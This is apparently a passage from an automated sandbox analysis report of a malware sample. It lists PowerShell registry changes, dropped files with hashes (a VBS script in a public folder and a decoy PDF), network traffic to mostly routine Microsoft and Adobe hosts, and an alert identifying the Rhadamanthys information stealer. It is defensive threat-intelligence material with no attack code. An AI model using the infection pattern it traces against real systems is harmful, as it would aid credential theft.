c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
78 407
Read events
78 021
Write events
368
Delete events
18

Modification events

(PID) Process: (3324) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (3324) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (3324) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

(PID) Process: (3324) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

(PID) Process: (4072) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (4072) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (4072) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (4072) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (4072) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

(PID) Process: (4072) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: MaxFileSize
Value: 1048576
Executable files
1
Suspicious files
319
Text files
57
Unknown types
7

Dropped files

PID
Process
Filename
Type
PID: 3324
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x11sgyqb.wxz.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 880
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_snwgaeve.4oa.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_asbldyyp.0gv.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SB9035E8QQP9L9BT9ERG.temp
Type: binary
MD5: 0BE6EF689FBD90825414B2853F6522FA
SHA256: 1F74C77C48BF64C5DFBEBEE9C81D86F2B376A62C8F68E19E503D194E56941503

PID: 880
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rko1u4ld.iuc.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b1a1c1d805115a10.customDestinations-ms
Type: binary
MD5: 0BE6EF689FBD90825414B2853F6522FA
SHA256: 1F74C77C48BF64C5DFBEBEE9C81D86F2B376A62C8F68E19E503D194E56941503

PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yveigid5.yd5.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3324
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tktomoj2.neh.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4072
Process: powershell.exe
Filename: C:\Users\Public\p2q.vbs
Type: text
MD5: 8DF76AF54C38D5D4C2CD9F6D18EEDF92
SHA256: 2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77

PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\Desktop\List of Required items and services.pdf
Type: pdf
MD5: E7CB275663A518442FD2400BFEB0D079
SHA256: AC19E9EC19B3F120928995449C99DB63C22AD6EF7030EB113A8FCF29A82A69EA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
46
TCP/UDP connections
167
DNS requests
137
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1544
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
2672
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
2672
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
3872
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
unknown
5220
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
5220
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
6260
AdobeARM.exe
GET
304
23.48.23.34:80
http://acroipm2.adobe.com/assets/Owner/arm/ReportOwner.txt
unknown
unknown
3040
OfficeClickToRun.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
2628
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
unknown
6260
AdobeARM.exe
GET
404
23.48.23.34:80
http://acroipm2.adobe.com/assets/Owner/arm/2024/7/UC/Other.txt
unknown
unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2672
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4032
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
3992
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1436
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4656
SearchApp.exe
104.126.37.153:443
r.bing.com
Akamai International B.V.
DE
unknown
1544
svchost.exe
40.126.31.69:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1544
svchost.exe
192.229.221.95:80
EDGECAST
US
whitelisted
1060
svchost.exe
23.35.238.131:443
go.microsoft.com
AKAMAI-AS
DE
unknown

DNS requests

Domain
IP
Reputation
r.bing.com
  • 104.126.37.153
  • 104.126.37.184
  • 104.126.37.163
  • 104.126.37.171
  • 104.126.37.179
  • 104.126.37.155
  • 104.126.37.162
  • 104.126.37.168
  • 104.126.37.161
whitelisted
login.live.com
  • 40.126.31.69
  • 40.126.31.67
  • 20.190.159.73
  • 40.126.31.71
  • 20.190.159.0
  • 20.190.159.68
  • 20.190.159.64
  • 20.190.159.2
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
self.events.data.microsoft.com
  • 52.168.117.174
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 40.127.169.103
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
6352
OOBE-Maintenance.exe
A Network Trojan was detected
STEALER [ANY.RUN] Rhadamanthys SSL Certificate and JA3s
11 ETPRO signatures available at the full report
Process
Message
OOBE-Maintenance.exe
[thresholding] image = 000001E9246F3050 , (0 , 1220) (0 , 610)
OOBE-Maintenance.exe
[thresholding] image = 000001E9246F3050 , (0 , 1078) (0 , 539)
OOBE-Maintenance.exe
[thresholding] image = 000001E925407040 , (0 , 1521) (0 , 760)
OOBE-Maintenance.exe
[thresholding] image = 000001E925407040 , (0 , 1543) (0 , 772)
OOBE-Maintenance.exe
[thresholding] image = 000001E9246F3050 , (0 , 1325) (0 , 662)
OOBE-Maintenance.exe
[thresholding] image = 000001E924473E60 , (0 , 1020) (0 , 510)